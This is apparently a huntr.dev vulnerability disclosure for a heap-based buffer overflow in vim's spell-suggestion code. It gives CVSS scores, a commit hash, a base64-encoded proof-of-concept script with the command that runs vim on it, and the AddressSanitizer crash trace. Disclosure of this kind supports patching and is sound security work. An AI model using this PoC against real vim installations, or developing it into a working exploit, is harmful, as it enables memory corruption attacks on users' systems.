huntr / Alkyne / 9E4DE32F-AD5F-4830-B3AE-9467B5AB90A1
Mar 12, 2022 - 3:45 p.m.

Heap-based Buffer Overflow occurs in vim

2022-03-12 15:45:57
alkyne
www.huntr.dev
12

CVSS3: 7.8 High
  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: LOW
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS2: 4.6 Medium
  Access Vector: LOCAL
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.001 Low
  Percentile: 17.1%

Description

Heap-based Buffer Overflow occurs in suggest_try_change().

commit : d0b7bfa95798f5ec743d8afffbffb83aeac823da

Proof of Concept

$ echo -ne "c2UgZW5jb2Rpbmc9aXNvODg1OQpub3JtMFIwMDAwMDAwMDAwMApzaWwwbm9ybRYwCmZ1IFIoKQpz
aWwhbm9ybRZpMDAwMDApCmNhbCBSKCkKbm9ybTF6PQplbmRmCmNhbCBSKCk="  | base64 -d > poc

$ ASAN
$ ./src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
=================================================================
==127228==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6120000212f8 at pc 0x000000430f36 bp 0x7ffd494cbe70 sp 0x7ffd494cb630
READ of size 1 at 0x6120000212f8 thread T0
    #0 0x430f35 in strlen (/home/alkyne/vim-debug/src/vim.asan+0x430f35)
    #1 0xbb0404 in suggest_try_change /home/alkyne/vim-debug/src/spellsuggest.c:1188:42
    #2 0xbaa268 in spell_suggest_intern /home/alkyne/vim-debug/src/spellsuggest.c:1004:5
    #3 0xba6e13 in spell_find_suggest /home/alkyne/vim-debug/src/spellsuggest.c:879:6
    #4 0xba37da in spell_suggest /home/alkyne/vim-debug/src/spellsuggest.c:550:5
    #5 0x922c10 in nv_zet /home/alkyne/vim-debug/src/normal.c:2998:7
    #6 0x8f406d in normal_cmd /home/alkyne/vim-debug/src/normal.c:930:5
    #7 0x6f763d in exec_normal /home/alkyne/vim-debug/src/ex_docmd.c:8670:6
    #8 0x6f7243 in exec_normal_cmd /home/alkyne/vim-debug/src/ex_docmd.c:8633:5
    #9 0x6f6fa3 in ex_normal /home/alkyne/vim-debug/src/ex_docmd.c:8551:6
    #10 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
    #11 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
    #12 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
    #13 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
    #14 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
    #15 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
    #16 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
    [frames #17 through #250 omitted: they repeat the seven-frame cycle of frames #10-#16 (do_one_cmd, do_cmdline, call_user_func, call_user_func_check, call_func, get_func_tv, ex_call)]

0x6120000212f8 is located 0 bytes to the right of 312-byte region [0x6120000211c0,0x6120000212f8)
allocated by thread T0 here:
    #0 0x499c8d in malloc (/home/alkyne/vim-debug/src/vim.asan+0x499c8d)
    #1 0x4cb0e0 in lalloc /home/alkyne/vim-debug/src/alloc.c:248:11
    #2 0x4cb039 in alloc /home/alkyne/vim-debug/src/alloc.c:151:12
    #3 0xbca715 in vim_strsave /home/alkyne/vim-debug/src/strings.c:27:9
    #4 0xba364f in spell_suggest /home/alkyne/vim-debug/src/spellsuggest.c:540:12
    #5 0x922c10 in nv_zet /home/alkyne/vim-debug/src/normal.c:2998:7
    #6 0x8f406d in normal_cmd /home/alkyne/vim-debug/src/normal.c:930:5
    #7 0x6f763d in exec_normal /home/alkyne/vim-debug/src/ex_docmd.c:8670:6
    #8 0x6f7243 in exec_normal_cmd /home/alkyne/vim-debug/src/ex_docmd.c:8633:5
    #9 0x6f6fa3 in ex_normal /home/alkyne/vim-debug/src/ex_docmd.c:8551:6
    #10 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
    #11 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
    #12 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
    #13 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
    #14 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
    #15 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
    #16 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
    #17 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
    #18 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
    #19 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
    #20 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
    #21 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
    #22 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
    #23 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
    #24 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
    #25 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
    #26 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
    #27 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
    #28 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
    #29 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/vim-debug/src/vim.asan+0x430f35) in strlen
==127228==ABORTING

Impact

This vulnerability can be used to exploit the binary.
